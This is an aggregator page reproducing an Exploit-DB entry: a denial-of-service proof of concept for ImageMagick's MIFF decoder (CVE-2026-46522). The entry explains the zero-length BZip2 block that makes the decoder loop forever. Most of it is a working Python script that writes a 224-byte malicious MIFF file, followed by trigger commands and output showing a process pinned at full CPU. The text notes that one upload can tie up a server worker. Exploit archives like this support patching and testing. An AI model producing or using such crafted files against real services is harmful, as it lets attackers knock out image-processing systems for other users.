惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Attack and Defense Labs
Attack and Defense Labs
宝玉的分享
宝玉的分享
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
D
Darknet – Hacking Tools, Hacker News & Cyber Security
V
Vulnerabilities – Threatpost
博客园_首页
Engineering at Meta
Engineering at Meta
F
Fortinet All Blogs
C
Cyber Attacks, Cyber Crime and Cyber Security
罗磊的独立博客
V
Visual Studio Blog
Know Your Adversary
Know Your Adversary
Hacker News - Newest:
Hacker News - Newest: "LLM"
美团技术团队
L
LINUX DO - 最新话题
The Last Watchdog
The Last Watchdog
博客园 - 三生石上(FineUI控件)
T
Tor Project blog
云风的 BLOG
云风的 BLOG
N
Netflix TechBlog - Medium
MyScale Blog
MyScale Blog
The GitHub Blog
The GitHub Blog
有赞技术团队
有赞技术团队
I
InfoQ
Last Week in AI
Last Week in AI
V2EX - 技术
V2EX - 技术
量子位
S
Secure Thoughts
L
LangChain Blog
The Hacker News
The Hacker News
H
Help Net Security
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
小众软件
小众软件
K
Kaspersky official blog
Security Archives - TechRepublic
Security Archives - TechRepublic
Google Online Security Blog
Google Online Security Blog
I
Intezer
Vercel News
Vercel News
Hacker News: Ask HN
Hacker News: Ask HN
Cisco Talos Blog
Cisco Talos Blog
Google DeepMind News
Google DeepMind News
S
Securelist
阮一峰的网络日志
阮一峰的网络日志
G
Google Developers Blog
Help Net Security
Help Net Security
Martin Fowler
Martin Fowler
爱范儿
爱范儿
Y
Y Combinator Blog
C
Check Point Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Jose Rivas · 2026-05-29 · via Exploit-DB.com RSS Feed
# Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion 
# Google Dork: N/A
# Date: 2026-05-13
# Exploit Author: Jose Rivas (bl4cksku11) & Zero Trust Offsec
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/download/
# Version: ImageMagick 7.x, verified on 7.1.2-3 system
# CVE : CVE-2026-46522
# GHSA: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7gg8-qqx7-92g5
"""
Description
-----------
coders/miff.c ReadMIFFImage BZip2 branch does not reject length=0 in the
per-block compressed length prefix. BZ2_bzDecompress with avail_in=0 returns
BZ_OK silently, and the IM loop only exits on BZ_STREAM_END or on codes that
are neither BZ_OK nor BZ_STREAM_END. The loop spins forever consuming CPU.

LZMA and Zip branches have the same code shape but their decompressor
libraries return BUF_ERROR on empty input, so they bail out.

Minimal PoC is 224 bytes. Single HTTP upload pegs a worker at 100 percent CPU
until killed by a request timeout or by the OS.

Usage
-----
    python3 miff_bzip_dos.py [OUTPUT_PATH]

Default OUTPUT_PATH is /tmp/poc.miff. Then trigger:

    /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\
      timeout 5 magick identify /tmp/poc.miff

Expected output:
    Command exited with non-zero status 124
    wall=5.00s user=5.00s cpu=100% exit=124

The process never finishes on its own. Timeout kills it.
"""

import sys

def craft_miff(path: str) -> None:
    header = (
        b"id=ImageMagick version=1.0\n"
        b"class=DirectClass colors=0 alpha-trait=Undefined\n"
        b"number-channels=3 number-meta-channels=0 channel-mask=0x0000000000000007\n"
        b"columns=1 rows=1 depth=8\n"
        b"colorspace=sRGB compression=BZip quality=75\n"
        b"\x0c\n"          # form feed terminator, then one byte consumed by ReadBlobByte
    )
    body = b"\x00\x00\x00\x00"   # 4-byte MSB length=0, triggers the infinite loop
    with open(path, "wb") as f:
        f.write(header + body)
    import os
    print(f"[+] Wrote {path} ({os.path.getsize(path)} bytes)")
    print(f"[+] Trigger with:")
    print(f"    /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\")
    print(f"      timeout 5 magick identify {path}")

if __name__ == "__main__":
    craft_miff(sys.argv[1] if len(sys.argv) > 1 else "/tmp/poc.miff")